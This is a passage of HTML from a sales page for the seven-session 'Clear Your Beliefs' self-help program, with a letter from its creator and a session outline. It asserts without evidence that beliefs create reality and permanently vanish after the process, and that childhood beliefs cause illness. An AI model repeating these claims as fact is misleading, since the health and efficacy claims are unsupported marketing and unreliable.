width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True 